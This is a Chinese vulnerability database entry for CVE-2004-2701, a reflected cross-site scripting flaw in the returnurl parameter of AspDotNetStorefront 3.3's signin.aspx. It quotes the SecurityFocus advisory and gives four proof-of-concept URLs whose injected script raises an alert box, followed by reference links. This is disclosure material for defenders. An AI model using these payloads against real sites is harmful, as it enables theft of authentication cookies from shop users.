AspDotNetStorefront ReturnURL参数跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107987 漏洞类型 跨站脚本
发布时间 2004-06-09 更新时间 2007-10-09
CVE编号 CVE-2004-2701 CNNVD-ID CNNVD-200412-1029
漏洞平台 ASP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24185
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1029
|漏洞详情
AspDotNetStorefront3.3版本的signin.aspx存在跨站脚本(XSS)漏洞。远程攻击者借助returnurl参数注入任意web脚本或者HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/10507/info

AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks.

AspDotNetStorefront 3.3 is reportedly affected by this issue, however, it is possible that other versions are affected as well.

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style=
"background:url(javascript:alert('Vulnerable_To_XSS'))"%20"

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=--><scri
pt>alert('Vulnerable_To_XSS')</script>

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"><scri
pt>alert("Vulnerable_To_XSS")</script>

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img
%20src="javascript:alert('Vulnerable_To_XSS')">
|参考资料

来源:XF
名称:aspdotnetstorefront-signin-xss(16426)
链接:http://xforce.iss.net/xforce/xfdb/16426
来源:BID
名称:10507
链接:http://www.securityfocus.com/bid/10507
来源:SECUNIA
名称:11839
链接:http://secunia.com/advisories/11839
来源:FULLDISC
名称:20040609[FULLDISCLOSURE]ASPDOTNETSTOREFRONTCross-SiteScriptingVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0229.html
来源:BUGTRAQ
名称:20040609[FULLDISCLOSURE]ASPDOTNETSTOREFRONTCross-SiteScriptingVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2004-06/0129.html